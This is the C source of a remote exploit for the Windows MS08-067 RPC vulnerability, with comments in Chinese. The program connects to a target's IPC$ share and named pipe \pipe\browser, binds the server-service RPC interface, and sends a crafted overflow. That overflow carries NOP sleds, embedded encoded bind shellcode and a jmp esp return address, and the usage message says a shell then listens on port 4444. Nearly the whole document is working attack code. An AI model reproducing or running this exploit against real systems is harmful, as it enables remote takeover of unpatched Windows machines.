MS08-067

// MS08-067 Exploit 冷却整理//// [Microsoft Visual C++ .NET] 编译通过// [WindowsXP SP2 简体中文纯净版] 测试通过，但成功率并不是100%// 漏洞分析参见 http://blog.csdn.net/iiprogram/article/details/3156229#include <stdio.h>#include <stdlib.h>#include <winsock2.h>#include <Rpc.h>#pragma comment(lib, "ws2_32.lib")#pragma comment(lib, "Rpcrt4.lib")#pragma comment(lib, "mpr.lib")struct RPCBIND{BYTE  VerMaj;BYTE  VerMin;BYTE  PacketType;BYTE  PacketFlags;DWORD DataRep;WORD  FragLength;WORD  AuthLength;DWORD CallID;WORD  MaxXmitFrag;WORD  MaxRecvFrag;DWORD AssocGroup;BYTE  NumCtxItems;WORD  ContextID;WORD  NumTransItems;GUID  InterfaceUUID;WORD  InterfaceVerMaj;WORD  InterfaceVerMin;GUID  TransferSyntax;DWORD SyntaxVer;};/*struct RPCFUNC{BYTE  VerMaj;BYTE  VerMin;BYTE  PacketType;BYTE  PacketFlags;DWORD DataRep;WORD  FragLength;WORD  AuthLength;DWORD CallID;DWORD AllocHint;WORD  ContextID;WORD  Opnum;};*/BYTE PRPC[0x48] = {0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};BYTE POP[] = //stub header RPCFUNC structure"\x05\x00""\x00\x03\x10\x00\x00\x00\xE4\x01\x00\x00\x01\x00\x00\x00\xD4\x01""\x00\x00\x00\x00\x1f\x00""\x00\x00\x00\x00""\xCF\x00\x00\x00\x00\x00\x00\x00\xCF\x00\x00\x00""\x5c\x00""\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // 74"\x90\x90""\x90\x90\x90\x90""\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xCC\x41""\x00\x00\x00\x00\x01\x00""\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00""\x00\x00""\x01\x00\x00\x00\x01\x00\x00\x00";unsigned char bind_shellcode[] =// "\xCC"// "\x83\xEC\x40" // sub esp, 0x70"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xad""\x07\xe6\x4a\x83\xeb\xfc\xe2\xf4\x51\x6d\x0d\x07\x45\xfe\x19\xb5""\x52\x67\x6d\x26\x89\x23\x6d\x0f\x91\x8c\x9a\x4f\xd5\x06\x09\xc1""\xe2\x1f\x6d\x15\x8d\x06\x0d\x03\x26\x33\x6d\x4b\x43\x36\x26\xd3""\x01\x83\x26\x3e\xaa\xc6\x2c\x47\xac\xc5\x0d\xbe\x96\x53\xc2\x62""\xd8\xe2\x6d\x15\x89\x06\x0d\x2c\x26\x0b\xad\xc1\xf2\x1b\xe7\xa1""\xae\x2b\x6d\xc3\xc1\x23\xfa\x2b\x6e\x36\x3d\x2e\x26\x44\xd6\xc1""\xed\x0b\x6d\x3a\xb1\xaa\x6d\x0a\xa5\x59\x8e\xc4\xe3\x09\x0a\x1a""\x52\xd1\x80\x19\xcb\x6f\xd5\x78\xc5\x70\x95\x78\xf2\x53\x19\x9a""\xc5\xcc\x0b\xb6\x96\x57\x19\x9c\xf2\x8e\x03\x2c\x2c\xea\xee\x48""\xf8\x6d\xe4\xb5\x7d\x6f\x3f\x43\x58\xaa\xb1\xb5\x7b\x54\xb5\x19""\xfe\x54\xa5\x19\xee\x54\x19\x9a\xcb\x6f\xf7\x16\xcb\x54\x6f\xab""\x38\x6f\x42\x50\xdd\xc0\xb1\xb5\x7b\x6d\xf6\x1b\xf8\xf8\x36\x22""\x09\xaa\xc8\xa3\xfa\xf8\x30\x19\xf8\xf8\x36\x22\x48\x4e\x60\x03""\xfa\xf8\x30\x1a\xf9\x53\xb3\xb5\x7d\x94\x8e\xad\xd4\xc1\x9f\x1d""\x52\xd1\xb3\xb5\x7d\x61\x8c\x2e\xcb\x6f\x85\x27\x24\xe2\x8c\x1a""\xf4\x2e\x2a\xc3\x4a\x6d\xa2\xc3\x4f\x36\x26\xb9\x07\xf9\xa4\x67""\x53\x45\xca\xd9\x20\x7d\xde\xe1\x06\xac\x8e\x38\x53\xb4\xf0\xb5""\xd8\x43\x19\x9c\xf6\x50\xb4\x1b\xfc\x56\x8c\x4b\xfc\x56\xb3\x1b""\x52\xd7\x8e\xe7\x74\x02\x28\x19\x52\xd1\x8c\xb5\x52\x30\x19\x9a""\x26\x50\x1a\xc9\x69\x63\x19\x9c\xff\xf8\x36\x22\x42\xc9\x06\x2a""\xfe\xf8\x30\xb5\x7d\x07\xe6\x4a";BYTE EXPLOIT[] ="\x05\x00""\x00\x03\x10\x00\x00\x00\xA4\x00\x00\x00\x01\x00\x00\x00\x94\x00""\x00\x00\x00\x00\x1f\x00""\x00\x00\x00\x00""\x2F\x00\x00\x00\x00\x00\x00\x00\x2F\x00\x00\x00""\x5c\x00""\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00""\x41\x41""\x41\x41\x41\x41""\x41\x41\x41\x41""\x41\x41\x41\x41""\x41\x41\x41\x41""\x12\x45\xfa\x7f" // jmp esp"\x90\x8B\xF4\x81""\x3E\x90\x90\x90\x90\x74\x04\x4E\x4E\xEB\xF4\x33\xC9\x33\xDB\xB1""\x01\xC1\xE1\x09\x8B\xFC\x4B\xC1\xE3\x0D\x23\xFB\x57\xF3\xA4\x5F"// "\xB1\x01\xC1\xE1\x09\x2B\xE1\xFF\xE7\x41\x41\x41\x41\x41\x41\x41""\x83\xEC\x70\x90\x90\x90\x90\xFF\xE7\x41\x41\x41\x41\x41\x41\x41""\x00\x00\x00\x00\x01\x00""\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00""\x00\x00""\x01\x00\x00\x00\x01\x00\x00\x00";int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer){BYTE rbuf[256] = "";DWORD dw = 0;struct RPCBIND RPCBind;memcpy(&RPCBind, &PRPC, sizeof(RPCBind));UuidFromString((unsigned char *)Interface, &RPCBind.InterfaceUUID);RPCBind.InterfaceVerMaj = atoi(&InterfaceVer[0]);RPCBind.InterfaceVerMin = atoi(&InterfaceVer[2]);TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf, sizeof(rbuf), &dw, NULL);return 0;}void usage(char* argv[]){printf("=============================================\n");printf("\tMS08-067 远程溢出Exploit\n\n");printf("  溢出成功后侦听端口：4444\n");printf("  使用方法：%s {IP}\n", argv[0]);printf("=============================================\n");}int main(int argc, char* argv[]){char* server = NULL;char unc[MAX_PATH];char szPipe[MAX_PATH];WSADATA wsa;NETRESOURCE nr;HANDLE hFile;BYTE rbuf[256] = "";DWORD dw = 0;if ( argc != 2 ){usage(argv);return -1;}server = argv[1];if ( WSAStartup(MAKEWORD(2,2), &wsa) != 0 ){printf("初始化Socket出错\n");return -1;}_snprintf(unc, sizeof(unc), "\\\\%s\\IPC$", server);nr.dwType = RESOURCETYPE_ANY;nr.lpLocalName = NULL;nr.lpRemoteName = unc;nr.lpProvider = NULL;printf("连接 %s ipc$ ...", server);if ( WNetAddConnection2(&nr, "", "", 0) != 0 ){printf("失败!\n");return -1;}else{printf("成功!\n");}_snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser", server);printf("打开 \\\\%s\\pipe\\browser ...", server);hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);if ( hFile == (HANDLE)(-1) ){printf("失败!\n");return -1;}else{printf("成功!\n");}printf("Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface\n");BindRpcInterface(hFile, "4b324fc8-1670-01d3-1278-5a47bf6ee188", "3.0");PVOID ptr = (PVOID)&POP;memcpy((char*)ptr+74, bind_shellcode, sizeof(bind_shellcode)-1);printf("发送 shellcode ...\n");TransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP)-1, rbuf, sizeof(rbuf), &dw, NULL);printf("发送 溢出块 ...\n");TransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT)-1, rbuf, sizeof(rbuf), &dw, NULL);CloseHandle(hFile);return 0;}